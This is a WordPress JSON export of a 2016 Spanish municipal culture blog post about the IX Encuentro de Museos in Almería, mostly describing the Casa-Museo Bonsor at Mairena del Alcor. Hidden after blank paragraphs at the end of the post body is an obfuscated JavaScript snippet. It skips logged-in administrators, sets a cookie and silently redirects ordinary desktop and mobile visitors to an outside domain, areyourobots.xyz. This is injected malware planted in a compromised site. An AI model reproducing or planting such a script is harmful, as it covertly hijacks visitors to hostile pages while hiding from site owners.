{"id":2406,"date":"2016-12-09T12:18:22","date_gmt":"2016-12-09T12:18:22","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=2406"},"modified":"2016-12-09T12:19:17","modified_gmt":"2016-12-09T12:19:17","slug":"ix-encuentro-de-museos-centros-de-interpretacion-y-colecciones-museograficas","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2016\/12\/09\/ix-encuentro-de-museos-centros-de-interpretacion-y-colecciones-museograficas\/","title":{"rendered":"IX Encuentro de Museos, Centros de Interpretaci\u00f3n y Colecciones Museogr\u00e1ficas"},"content":{"rendered":"<p class=\"western\">Celebraci\u00f3n del IX Encuentro de Museos, Centros de Interpretaci\u00f3n y Colecciones Museogr\u00e1ficas organizado por el Instituto de Estudios Almerienses.<\/p>\n<p class=\"western\"><!--more--><\/p>\n<p class=\"western\" style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/03\/Domingo-Ortiz-2012.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-1993\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/03\/Domingo-Ortiz-2012.jpg\" alt=\"Domingo Ortiz 2012\" width=\"160\" height=\"264\" \/><\/a><\/p>\n<p class=\"western\" style=\"text-align: right\">Domingo Ortiz Soler<\/p>\n<p class=\"western\">Como todos los a\u00f1os, se ha celebrado el d\u00eda 5 de noviembre el <b>IX Encuentro de Museos, Centros de Interpretaci\u00f3n y Colecciones Museogr\u00e1ficas,<\/b> organizado por el Instituto de Estudios Almerienses de la Diputaci\u00f3n Provincial, donde cada a\u00f1o nos reunimos gestores y directores de centros muse\u00edsticos locales para hablar acerca del patrimonio muse\u00edstico de la provincia, su problem\u00e1tica, sus necesidades, etc., con el fin de mostrar la puesta en valor que hacen los municipios de Almer\u00eda de su historia, arte y cultura y para acercar el patrimonio muse\u00edstico de la provincia a los almerienses, invitando a su vez a diversos ponentes expertos en montaje de museos, de otras latitudes del pa\u00eds, a exponer sus experiencias de proyectos. Entre los participantes estaban los responsables de algunos de los centros muse\u00edsticos de la provincia, al que asisti\u00f3 la representaci\u00f3n del Museo Hist\u00f3rico Municipal de Vera, donde igualmente se desarroll\u00f3 hace a\u00f1os uno de estos Encuentros de Museos.<\/p>\n<p class=\"western\">Un museo o un centro de interpretaci\u00f3n es mucho mas que una colecci\u00f3n de objetos, restos arqueol\u00f3gicos\u2026, es un testimonio vivo de un municipio donde su esfuerzo no suele ser tanto el tener un patrimonio que exponer, sino el presentar su equipamiento a los visitantes de la manera m\u00e1s eficaz y did\u00e1ctica posible.<\/p>\n<p class=\"western\">El IEA consciente de esta dificultad, lleva desde 2007 realizando estos encuentros anuales para mejorar la formaci\u00f3n de sus gestores.<\/p>\n<p class=\"western\">En esta ocasi\u00f3n se quiere potenciar la mejora en la gesti\u00f3n de los fondos de nuestros museos con los problemas cotidianos de cada d\u00eda: las colecciones, su ubicaci\u00f3n, su mantenimiento, el personal, la difusi\u00f3n\u2026, siendo conscientes que cada paso adelante es un logro excepcional. Por esto es necesario mirar a los que han conseguido ciertos resultados expositivos que los llevan a ser modelos a seguir en el dif\u00edcil caminar de los museos.<\/p>\n<p class=\"western\">La actividad y su programaci\u00f3n han tenido lugar el s\u00e1bado 5 de noviembre en Fond\u00f3n, en la sede del Museo Casa-Palacio de las Godoyas. Estos encuentros pretenden mostrar la puesta en valor que hacen los municipios por difundir su historia, arte y cultura. Un esfuerzo que se concentra en Museos y Centros de Interpretaci\u00f3n y que desde el 2007 el IEA apoya a trav\u00e9s de estos encuentros anuales con el fin de potenciar la mejora de la gesti\u00f3n de los fondos muse\u00edsticos locales y el conocimiento de los mismos. La iniciativa pretende mostrar la puesta en valor que hacen los municipios por difundir su historia, arte y cultura. La jornada est\u00e1 dirigida principalmente a responsables de museos o centros de interpretaci\u00f3n, personal de atenci\u00f3n al p\u00fablico de equipamientos muse\u00edsticos, t\u00e9cnicos municipales y personal de ayuntamientos y entidades culturales. Un trabajo que para los peque\u00f1os museos es un gran esfuerzo y que tienen como recompensa el respaldo del p\u00fablico obteniendo ciertos resultados expositivos que los llevan a ser, de alguna manera, modelos a seguir en el dif\u00edcil caminar de los museos.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Dependencias-en-el-patio-lucernario-de-la-Casa-Palacio-de-las-Godoyas.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-2409\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Dependencias-en-el-patio-lucernario-de-la-Casa-Palacio-de-las-Godoyas.jpg\" alt=\"dependencias-en-el-patio-lucernario-de-la-casa-palacio-de-las-godoyas\" width=\"277\" height=\"208\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Dependencias en el patio\/lucernario de la Casa Palacio de las Godoyas<\/i><\/span><\/p>\n<p class=\"western\"><span style=\"font-size: large\"><b>Sobre la problem\u00e1tica de los peque\u00f1os museos locales<\/b><\/span><\/p>\n<p class=\"western\">Los grandes museos disponen de personal especializado y recursos para la pedagog\u00eda expositiva. Sin embargo, la realidad de los equipamientos peque\u00f1os es muy distinta. En esta edici\u00f3n se aportar\u00e1n experiencias de museos de localidades no capitalinas que han conseguido resultados satisfactorios \u00a0y cuyos criterios y estrategias empleadas para mostrar sus fondos pueden ser extrapolables.<\/p>\n<p>Mediante un programa de conferencias magistrales y actividades especiales buscamos avanzar el debate en torno a las pol\u00edticas de representaci\u00f3n y los discursos de la historia y la memoria colectiva que tienen lugar en y desde los museos, as\u00ed como sobre los conflictos que introduce la museolog\u00eda precisamente en los acuerdos y desacuerdos que se deben llevar a cabo para que esas representaciones sean posibles.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Cartel-promocional-del-Museo-Bonsor.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-2408\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Cartel-promocional-del-Museo-Bonsor.jpg\" alt=\"cartel-promocional-del-museo-bonsor\" width=\"277\" height=\"410\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"font-size: small\"><i>Cartel promocional del Museo Bonsor<\/i><\/span><\/p>\n<p>La inauguraci\u00f3n e introducci\u00f3n por parte de la coordinadora del Encuentro llev\u00f3 a la Conferencia y coloquio: \u201c<i>La gesti\u00f3n expositiva de fondos heterog\u00e9neos en peque\u00f1os equipamientos muse\u00edsticos<\/i>\u201d, impartida por Ana G\u00f3mez D\u00edaz. <em>Directora<\/em> <em>de la<\/em> <em><b>Casa-Museo Bonsor Castillo de Mairena<\/b><\/em><em>. <\/em><em>Despu\u00e9s se ofreci\u00f3 un<\/em> recorrido por la Casa Palacio de las Godoyas, guiado por su responsable Joaqu\u00edn Gaona Villegas y con la interacci\u00f3n de Ana G\u00f3mez D\u00edaz. La clausura de la actividad se llev\u00f3 a cabo con la visita al Centro de Interpretaci\u00f3n del Patrimonio Cultural de la Alpujarra. Benecid, guiado por Agust\u00edn S\u00e1nchez Hita, responsable del mismo.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Ana-G\u00f3mez-D\u00edaz.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2407\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Ana-G\u00f3mez-D\u00edaz.jpg\" alt=\"ana-gomez-diaz\" width=\"306\" height=\"214\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\">Ana G\u00f3mez D\u00edaz. <em><span style=\"font-size: small\">Directora de la Casa-Museo Bonsor Castillo de Mairena<\/span><\/em><\/p>\n<p class=\"western\">La tem\u00e1tica desarrollada se centr\u00f3 en la experiencias de recuperaci\u00f3n de una colecci\u00f3n privada variopinta entre piezas de arte, arqueol\u00f3gicas, y etnogr\u00e1ficas de <strong>Jorge Bonsor,<\/strong> que este personaje organiz\u00f3 \u2018a modo de museo\u2019 en su casa del castillo de Mairena (Mairena del Alcor, Sevilla) y que una vez en propiedad del municipio se ha proyectado una nueva museografia basada en esta misma colecci\u00f3n, organizada y dirigida por Ana G\u00f3mez D\u00edaz, pero conservando el planteamiento original de Bonsor como impronta de lo que fue en sus or\u00edgenes fundacionales.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Museograf\u00eda-actual-de-la-colecci\u00f3n-Bonsor.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2413\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Museograf\u00eda-actual-de-la-colecci\u00f3n-Bonsor.jpg\" alt=\"museografia-actual-de-la-coleccion-bonsor\" width=\"400\" height=\"268\" \/><\/a><\/p>\n<p class=\"western\"><span style=\"font-size: small\"><i>Muestra de la museograf\u00eda actual siguiendo las pautas de la exposici\u00f3n original de Bonsor<\/i><\/span><\/p>\n<p class=\"western\">Alberga en su interior una notable colecci\u00f3n arqueol\u00f3gica, fiel reflejo del trabajo y las inquietudes de <strong>Bonsor<\/strong>. Este polifac\u00e9tico personaje franc\u00e9s, cautivado por el pintoresco exotismo, los paisajes y costumbres espa\u00f1olas, que decidi\u00f3 visitar nuestro pa\u00eds en busca de destellos que iluminasen sus cuadros para quedar finalmente atrapado por los rastros del pasado. Visitar el castillo es recrear escenas del ayer m\u00e1s remoto de la<b> <\/b><strong>comarca de Los Alcores<\/strong>, sentir el esp\u00edritu de una \u00e9poca. Como dijo la muse\u00f3loga <strong>Ren\u00e9e Sivan<\/strong>, \u201c<i>No se puede valorar lo que se desconoce y no se puede conservar lo que no se valora<\/i>\u201d.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Muestra-de-la-museograf\u00eda-actual-siguiendo-las-pautas-de-la-exposici\u00f3n-original-de-Bonsor.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2411\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Muestra-de-la-museograf\u00eda-actual-siguiendo-las-pautas-de-la-exposici\u00f3n-original-de-Bonsor.jpg\" alt=\"muestra-de-la-museografia-actual-siguiendo-las-pautas-de-la-exposicion-original-de-bonsor\" width=\"182\" height=\"277\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"font-size: small\"><i>Museograf\u00eda actual de la colecci\u00f3n Bonsor<\/i><\/span><\/p>\n<p><strong>La<\/strong><strong> \u2018Casa Museo Jorge Bonsor Castillo de Mairena\u2019\u00a0<\/strong>est\u00e1 emplazado en un castillo bastante bien conservado de la arquitectura militar cristiana de la Baja Edad Media. Consta de dos partes claramente diferenciadas, tanto por su cronolog\u00eda como por su estructura. La primera data de mediados del s. XIV, cuando Pedro Ponce de Le\u00f3n estableci\u00f3 el se\u00f1or\u00edo. La Casa Museo Bonsor, de Mairena del Alcor est\u00e1 ubicada en el interior del c<em>astillo mud\u00e9jar comprado por el arque\u00f3logo George Bonsor Saint-Martin, en 1902, con el fin de acondicionarlo como residencia y como museo.<\/em> Finalmente y tras muchos avatares, la gesti\u00f3n del inmueble pas\u00f3 al <strong>Ayuntamiento de Mairena del Alcor<\/strong>. La puesta en marcha de los trabajos de acondicionamiento se iniciaron en el 2000 con el fin de rehabilitar el castillo como <strong>Casa-Museo Bonsor<\/strong>, dedicado a su memoria donde sus colecciones y ambientaci\u00f3n permanecen intactas. Se restaur\u00f3 tambi\u00e9n el jard\u00edn, las murallas fueron consolidadas, se construy\u00f3 una nueva sala de exposiciones.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Montaje-museogr\u00e1fico-original-de-la-\u00e9poca-de-Bonsor.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2410\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Montaje-museogr\u00e1fico-original-de-la-\u00e9poca-de-Bonsor.jpg\" alt=\"montaje-museografico-original-de-la-epoca-de-bonsor\" width=\"718\" height=\"483\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"font-size: small\"><i>Montaje museogr\u00e1fico original de la \u00e9poca de Bonsor<\/i><\/span><\/p>\n<p><em>Los elementos arquitect\u00f3nicos, propios del gusto neoisl\u00e1mico de los viajeros rom\u00e1nticos, se funden con una jardiner\u00eda ecl\u00e9ctica andaluza. En el interior se ha conservado el discurso expositivo dise\u00f1ado por el propietario. Cuenta con colecciones, arqueol\u00f3gicas y etnogr\u00e1ficas, as\u00ed como con un vasto fondo fotogr\u00e1fico y documental.<\/em><\/p>\n<p>Durante la exposici\u00f3n de motivos tambi\u00e9n se reflexion\u00f3 sobre la problem\u00e1tica de este tipo de centros locales muse\u00edsticos que, una vez organizada la exposici\u00f3n permanente y su posterior inauguraci\u00f3n, quedan cerrados al p\u00fablico. Y un ejemplo m\u00e1s de esta disyuntiva es este Museo que solamente dispone de la directora del mismo y una persona de mantenimiento, por lo que se ve imposibilitado para su apertura durante toda la semana y es necesario concertar previamente la visita, solamente los martes. Y para su mantenimiento se cobra un precio por la entrada. Los precios var\u00edan en funci\u00f3n del recorrido. As\u00ed, el Circuito 1 incluye la visita libre de los jardines, miradores de la muralla, exposici\u00f3n temporal y Sala Bonsor arque\u00f3logo, con un coste de 4 euros por persona. El Circuito 2 sigue le mismo recorrido, pero incluye la visita guiada a la Casa Museo Bonsor, con un precio total de cinco euros.<\/p>\n<p>En casos especiales, los precios se reducen (de 4 a 2, y de 5 a 2,5 euros). Estos casos son los siguientes: grupos superiores a 20 personas, familias numerosas, nacidos y residentes en Mairena del Alcor, o miembros de asociaciones de amigos de los museos.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Museograf\u00eda-actual-con-el-despacho-de-Bonsor.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2412\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/12\/Museograf\u00eda-actual-con-el-despacho-de-Bonsor.jpg\" alt=\"museografia-actual-con-el-despacho-de-bonsor\" width=\"1600\" height=\"1046\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"font-size: small\"><i>Museograf\u00eda actual con el despacho de Bonsor<\/i><\/span><\/p>\n<p align=\"justify\">Con esta conferencia ha concluido el IX Encuentro de este a\u00f1o y que para el pr\u00f3ximo ser\u00e1 seleccionado otro pueblo que disponga de contenidos muse\u00edsticos como viene siendo habitual en esta programaci\u00f3n de <strong>Encuentro de Museos, Centros de Interpretaci\u00f3n y Colecciones Museogr\u00e1ficas<\/strong><b> <\/b>organizado por la Diputaci\u00f3n de Almer\u00eda a trav\u00e9s del <strong>Instituto de estudios Almerienses<\/strong>.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Celebraci\u00f3n del IX Encuentro de Museos, Centros de Interpretaci\u00f3n y Colecciones Museogr\u00e1ficas organizado por el Instituto de Estudios Almerienses.<\/p>\n","protected":false},"author":7,"featured_media":2410,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[183,4],"tags":[57],"class_list":["post-2406","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-etnologia","category-museo","tag-domingo-ortiz-soler"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2406","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=2406"}],"version-history":[{"count":1,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2406\/revisions"}],"predecessor-version":[{"id":2414,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2406\/revisions\/2414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/2410"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=2406"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=2406"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=2406"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}